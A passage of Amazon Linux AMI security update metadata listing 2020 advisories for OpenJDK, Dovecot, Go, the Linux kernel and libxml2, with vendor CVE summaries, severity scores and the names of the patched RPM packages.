arch="x86_64"><filename>Packages/clamav-update-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.102.4" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.102.4-1.44.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.102.4" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.102.4-1.44.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.102.4" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.102.4-1.44.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.102.4" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.102.4-1.44.amzn1.i686.rpm</filename></package><package name="clamd" version="0.102.4" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.102.4-1.44.amzn1.i686.rpm</filename></package><package name="clamav" version="0.102.4" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.102.4-1.44.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.102.4" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.102.4-1.44.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.102.4" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.102.4-1.44.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.102.4" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.102.4-1.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1434</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1434: important priority package update for java-1.8.0-openjdk</title><issued date="2020-09-14 20:58:00" /><updated date="2020-09-16 18:14:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14621:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JAXP). Supported versions that are affected are Java SE: 7u261, 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2020-14621:
1856885: CVE-2020-14621 OpenJDK: XML validation manipulation due to incomplete application of the use-grammar-pool-only feature (JAXP, 8242136)
CVE-2020-14593:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u261, 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N).
CVE-2020-14593:
1856784: CVE-2020-14593 OpenJDK: Incomplete bounds checks in Affine Transformations (2D, 8240119)
CVE-2020-14583:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u261, 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
CVE-2020-14583:
1856448: CVE-2020-14583 OpenJDK: Bypass of boundary checks in nio.Buffer via concurrent access (Libraries, 8238920)
CVE-2020-14579:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u261 and 8u251; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1856995: CVE-2020-14579 OpenJDK: Unexpected exception raised by DerValue.equals() (Libraries, 8237736)
CVE-2020-14578:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u261 and 8u251; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1856991: CVE-2020-14578 OpenJDK: Unexpected exception raised by DerInputStream (Libraries, 8237731)
CVE-2020-14577:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u261, 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).
CVE-2020-14577:
1856988: CVE-2020-14577 OpenJDK: HostnameChecker does not ensure X.509 certificate names are in normalized form (JSSE, 8237592)
CVE-2020-14556:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 8u251, 11.0.7 and 14.0.1; Java SE Embedded: 8u251. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
CVE-2020-14556:
1856896: CVE-2020-14556 OpenJDK: Incorrect handling of access control context in ForkJoinPool (Libraries, 8237117)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14556" title="" id="CVE-2020-14556" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14577" title="" id="CVE-2020-14577" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14578" title="" id="CVE-2020-14578" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14579" title="" id="CVE-2020-14579" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14583" title="" id="CVE-2020-14583" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14593" title="" id="CVE-2020-14593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14621" title="" id="CVE-2020-14621" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.265.b01-0.54.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.265.b01-0.54.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.265.b01-0.54.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.265.b01-0.54.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" 
arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.265.b01-0.54.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.265.b01-0.54.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.265.b01-0.54.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.265.b01-0.54.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.265.b01-0.54.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.265.b01-0.54.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.265.b01-0.54.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.265.b01-0.54.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.265.b01-0.54.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.265.b01" release="0.54.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.265.b01-0.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1435</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1435: important priority package update for dovecot</title><issued date="2020-10-26 17:59:00" /><updated date="2020-10-27 21:32:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-12674:
In Dovecot before 2.3.11.3, sending a specially formatted RPA request will crash the auth service because a length of zero is mishandled.
A flaw was found in dovecot. An attacker can use the way dovecot handles RPA (Remote Passphrase Authentication) to crash the authentication process repeatedly, preventing login. The highest threat from this vulnerability is to system availability.
1866317: CVE-2020-12674 dovecot: Crash due to assert in RPA implementation
CVE-2020-12673:
In Dovecot before 2.3.11.3, sending a specially formatted NTLM request will crash the auth service because of an out-of-bounds read.
A flaw was found in dovecot. An out-of-bounds read flaw was found in the way dovecot handled NTLM authentication, allowing an attacker to crash the dovecot auth process repeatedly and thereby prevent login. The highest threat from this vulnerability is to system availability.
1866313: CVE-2020-12673 dovecot: Out of bound reads in dovecot NTLM implementation
CVE-2020-12100:
In Dovecot before 2.3.11.3, uncontrolled recursion in submission, lmtp, and lda allows remote attackers to cause a denial of service (resource consumption) via a crafted e-mail message with deeply nested MIME parts.
A flaw was found in dovecot. A remote attacker could cause a denial of service by repeatedly sending emails whose MIME parts contain malicious content that dovecot will attempt to parse. The highest threat from this vulnerability is to system availability.
1866309: CVE-2020-12100 dovecot: Resource exhaustion via deeply nested MIME parts
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12100" title="" id="CVE-2020-12100" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12673" title="" id="CVE-2020-12673" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12674" title="" id="CVE-2020-12674" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dovecot-pgsql" version="2.2.36" release="6.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-pgsql-2.2.36-6.21.amzn1.x86_64.rpm</filename></package><package name="dovecot-mysql" version="2.2.36" release="6.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-mysql-2.2.36-6.21.amzn1.x86_64.rpm</filename></package><package name="dovecot-devel" version="2.2.36" release="6.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-devel-2.2.36-6.21.amzn1.x86_64.rpm</filename></package><package name="dovecot-pigeonhole" version="2.2.36" release="6.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-pigeonhole-2.2.36-6.21.amzn1.x86_64.rpm</filename></package><package name="dovecot-debuginfo" version="2.2.36" release="6.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-debuginfo-2.2.36-6.21.amzn1.x86_64.rpm</filename></package><package name="dovecot" version="2.2.36" release="6.21.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-2.2.36-6.21.amzn1.x86_64.rpm</filename></package><package name="dovecot-devel" version="2.2.36" release="6.21.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-devel-2.2.36-6.21.amzn1.i686.rpm</filename></package><package name="dovecot-pgsql" version="2.2.36" release="6.21.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-pgsql-2.2.36-6.21.amzn1.i686.rpm</filename></package><package name="dovecot-mysql" version="2.2.36" release="6.21.amzn1" epoch="1" 
arch="i686"><filename>Packages/dovecot-mysql-2.2.36-6.21.amzn1.i686.rpm</filename></package><package name="dovecot" version="2.2.36" release="6.21.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-2.2.36-6.21.amzn1.i686.rpm</filename></package><package name="dovecot-debuginfo" version="2.2.36" release="6.21.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-debuginfo-2.2.36-6.21.amzn1.i686.rpm</filename></package><package name="dovecot-pigeonhole" version="2.2.36" release="6.21.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-pigeonhole-2.2.36-6.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1436</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1436: medium priority package update for golang</title><issued date="2020-10-26 18:04:00" /><updated date="2020-10-27 23:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-16845:
Go before 1.13.15 and 14.x before 1.14.7 can have an infinite read loop in ReadUvarint and ReadVarint in encoding/binary via invalid inputs.
1867099: CVE-2020-16845 golang: ReadUvarint and ReadVarint can read an unlimited number of bytes from invalid inputs
CVE-2020-14040:
The x/text package before 0.3.3 for Go has a vulnerability in encoding/unicode that could lead to the UTF-16 decoder entering an infinite loop, causing the program to crash or run out of memory. An attacker could provide a single byte to a UTF16 decoder instantiated with UseBOM or ExpectBOM to trigger an infinite loop if the String function on the Decoder is called, or the Decoder is passed to golang.org/x/text/transform.String.
A denial of service vulnerability was found in the golang.org/x/text library. A library or application must use one of the vulnerable functions, such as unicode.Transform, transform.String, or transform.Byte, to be susceptible to this vulnerability. If an attacker is able to supply specific characters or strings to the vulnerable application, there is the potential to cause an infinite loop to occur using more memory, resulting in a denial of service.
1853652: CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14040" title="" id="CVE-2020-14040" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16845" title="" id="CVE-2020-16845" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-docs" version="1.13.15" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.13.15-1.59.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.13.15" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.13.15-1.59.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.13.15" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.13.15-1.59.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.13.15" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.13.15-1.59.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.13.15" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.13.15-1.59.amzn1.noarch.rpm</filename></package><package name="golang" version="1.13.15" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.13.15-1.59.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.13.15" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.13.15-1.59.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.13.15" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.13.15-1.59.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.13.15" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.13.15-1.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2020-1437</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1437: important priority package update for kernel</title><issued date="2020-10-26 18:08:00" /><updated date="2023-06-29 22:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-20565:
An issue in the HID driver in the Linux kernel may lead to invalid memory access.
CVE-2020-26088:
A missing capabilities check when creating NFC raw sockets could be used by local attackers to create raw sockets, bypassing security mechanisms allowing them to create or listen to NFC communication frames.
CVE-2020-25645:
A flaw was found in the Linux kernel. Traffic between two Geneve endpoints may be unencrypted when IPsec is configured to encrypt traffic for the specific UDP port used by the GENEVE tunnel, allowing anyone between the two endpoints to read the traffic unencrypted. The main threat from this vulnerability is to data confidentiality.
CVE-2020-25643:
A flaw was found in the HDLC_PPP module of the Linux kernel. Memory corruption and a read overflow are caused by improper input validation in the ppp_cp_parse_cr function, which can cause the system to crash or cause a denial of service. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2020-25641:
A flaw was found in the Linux kernel's implementation of biovecs. A zero-length biovec request issued by the block subsystem could cause the kernel to enter an infinite loop, causing a denial of service. This flaw allows a local attacker with basic privileges to issue requests to a block device, resulting in a denial of service. The highest threat from this vulnerability is to system availability.
CVE-2020-25285:
A flaw was found in the Linux kernel's sysctl handling code for hugepages management. When multiple root-level processes write to the /proc/sys/vm/nr_hugepages file at the same time, a race on internal variables can occur, leading to a system crash or memory corruption.
CVE-2020-25284:
A flaw was found in the capabilities check of the rados block device functionality in the Linux kernel. Incorrect capability checks could allow a local user with root privileges (but no capabilities) to add or remove Rados Block Devices from the system.
CVE-2020-25212:
A flaw was found in the NFSv4 implementation: when mounting a remote, attacker-controlled server, the server could return a specially crafted response that allows local memory corruption and possibly privilege escalation.
CVE-2020-14390:
A flaw was found in the Linux kernel. When changing screen size, an out-of-bounds memory write can occur leading to memory corruption or a denial of service. Due to the nature of the flaw, privilege escalation cannot be fully ruled out.
CVE-2020-14331:
A flaw was found in the Linux kernel's implementation of the invert video code on VGA consoles when a local attacker attempts to resize the console, calling an ioctl VT_RESIZE, which causes an out-of-bounds write to occur. This flaw allows a local user with access to the VGA console to crash the system, potentially escalating their privileges on the system. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2020-14314:
A memory out-of-bounds read flaw was found in the Linux kernel's ext3/ext4 file system, in the way it accesses a directory with broken indexing. This flaw allows a local user to crash the system if the directory exists. The highest threat from this vulnerability is to system availability.
CVE-2020-12888:
A flaw was found in the Linux kernel, where it allows userspace processes, for example a guest VM, to directly access hardware devices via its VFIO driver modules. The VFIO modules allow users to enable or disable access to the devices' MMIO memory address spaces. If a user attempts to read or write a device's MMIO address space while it is disabled, some hardware devices issue an interrupt to the CPU to indicate a fatal error condition, crashing the system. This flaw allows a guest user or process to crash the host system, resulting in a denial of service.
CVE-2019-19448:
A flaw was found in the Linux kernel's implementation of BTRFS free space management, where the kernel does not correctly manage the lifetime of internal data structures used. An attacker could use this flaw to corrupt memory or escalate privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19448" title="" id="CVE-2019-19448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12888" title="" id="CVE-2020-12888" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14314" title="" id="CVE-2020-14314" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14331" title="" id="CVE-2020-14331" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14390" title="" id="CVE-2020-14390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25212" title="" id="CVE-2020-25212" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25284" title="" id="CVE-2020-25284" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25285" title="" id="CVE-2020-25285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25641" title="" id="CVE-2020-25641" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25643" title="" id="CVE-2020-25643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25645" title="" id="CVE-2020-25645" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26088" title="" id="CVE-2020-26088" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20565" title="" id="CVE-2022-20565" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.200" release="116.320.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.200" release="116.320.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.200-116.320.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.200-116.320.amzn1.i686.rpm</filename></package><package 
name="perf-debuginfo" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.200-116.320.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.200" release="116.320.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.200-116.320.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1438</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1438: medium priority package update for libxml2</title><issued date="2020-10-26 18:09:00" /><updated date="2020-10-27 21:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7595:
xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation.
1799786: CVE-2020-7595 libxml2: infinite loop in xmlStringLenDecodeEntities in some end-of-file situations
CVE-2019-20388:
A memory leak was found in the xmlSchemaValidateStream function of libxml2. Applications that use this library may be vulnerable to memory not being freed leading to a denial of service. System availability is the highest threat from this vulnerability.
1799734: CVE-2019-20388 libxml2: memory leak in xmlSchemaPreRun in xmlschemas.c
CVE-2019-19956:
xmlParseBalancedChunkMemoryRecover in parser.c in libxml2 before 2.9.10 has a memory leak related to newDoc->oldNs.
1788856: CVE-2019-19956 libxml2: memory leak in xmlParseBalancedChunkMemoryRecover in parser.c
